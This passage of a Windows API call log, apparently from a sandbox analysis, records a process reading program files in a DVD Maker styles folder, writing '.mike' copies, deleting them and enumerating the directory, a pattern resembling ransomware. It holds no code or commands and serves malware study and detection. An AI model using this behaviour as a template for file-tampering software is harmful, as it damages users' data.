Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.842] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.842] GetFileType (hFile=0x288) returned 0x1 [0064.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.842] GetFileType (hFile=0x288) returned 0x1 [0064.842] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x372a20 [0064.843] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.843] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.843] GetFileType (hFile=0x288) returned 0x1 [0064.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.843] GetFileType (hFile=0x288) returned 0x1 [0064.843] ReadFile (in: hFile=0x288, lpBuffer=0x22d2e94, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22d2e94*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.853] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.853] GetFileType (hFile=0x288) returned 0x1 [0064.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.854] GetFileType (hFile=0x288) returned 0x1 [0064.854] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x375220 [0064.854] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.854] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.854] GetFileType (hFile=0x288) returned 0x1 [0064.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.855] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0065.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0065.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0065.255] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0065.257] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0065.257] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0065.258] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike")) returned 1 [0065.264] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0065.264] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike", lpFilePart=0x0) returned 0x52 [0065.264] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv", lpFilePart=0x0) returned 0x4d [0065.631] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike", lpFilePart=0x0) returned 0x52 [0065.631] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike", lpFilePart=0x0) returned 0x52 [0065.631] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv", dwFileAttributes=0x80) returned 0 [0065.632] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike", lpFilePart=0x0) returned 0x52 [0065.632] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike", lpFilePart=0x0) returned 0x52 [0065.632] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.mike")) returned 1 [0065.640] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0065.640] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x56 [0065.641] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv", lpFilePart=0x0) returned 0x51 [0066.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x56 [0066.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x56 [0066.034] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv", dwFileAttributes=0x80) returned 0 [0066.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x56 [0066.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x56 [0066.036] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.mike")) returned 1 [0066.043] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.043] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike", lpFilePart=0x0) returned 0x4c [0066.044] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png", lpFilePart=0x0) returned 0x47 [0066.047] WriteFile (in: hFile=0x288, lpBuffer=0x223f698*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x223f698*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.048] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike", lpFilePart=0x0) returned 0x4c [0066.048] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike", lpFilePart=0x0) returned 0x4c [0066.048] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png", dwFileAttributes=0x80) returned 0 [0066.049] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike", lpFilePart=0x0) returned 0x4c [0066.049] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike", lpFilePart=0x0) returned 0x4c [0066.049] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sports_disc_mask.png.mike")) returned 1 [0066.051] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xf0a875a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xf0a875a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.051] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ead378, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ead378, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb5e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CircleSubpicture.png", cAlternateFileName="")) returned 1 [0066.051] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ed34d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ed34d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x120d, dwReserved0=0x0, dwReserved1=0x0, cFileName="GoldRing.png", cAlternateFileName="")) returned 1 [0066.051] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71338a7f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71338a7f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6d3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="highlight.png", cAlternateFileName="")) returned 1 [0066.051] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ef9632, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ef9632, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xba2, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationButtonSubpicture.png", cAlternateFileName="")) returned 1 [0066.051] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ef9632, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ef9632, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xee0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NextMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0066.051] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f1f78f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f1f78f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xee2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ParentMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0066.052] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f1f78f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f1f78f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xeeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="PreviousMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0066.052] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f458ec, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f458ec, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SceneButtonInset_Alpha1.png", cAlternateFileName="")) returned 1 [0066.052] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f6ba49, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f6ba49, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="SceneButtonInset_Alpha2.png", cAlternateFileName="")) returned 1 [0066.052] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e8721b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71e8721b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SceneButtonSubpicture.png", cAlternateFileName="")) returned 1 [0066.052] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71893b93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71893b93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x500e57b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x539540, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainBackground.wmv", cAlternateFileName="")) returned 1 [0066.052] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71aa8ea9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71aa8ea9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x502ae81f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x57bbc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0066.052] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71c25c4b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71c25c4b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50320c39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1beae6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainToNotesBackground.wmv", cAlternateFileName="")) returned 1 [0066.053] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71cbe1bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71cbe1bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50393053, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c0a26, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainToNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0066.053] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71d7c890, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71d7c890, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x504c3b43, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x184166, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainToScenesBackground.wmv", cAlternateFileName="")) returned 1 [0066.053] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71deeca7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71deeca7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50add351, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x189f26, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainToScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0066.053] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713aae96, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x713aae96, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x514fb049, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6680f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsNotesBackground.wmv", cAlternateFileName="")) returned 1 [0066.053] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, 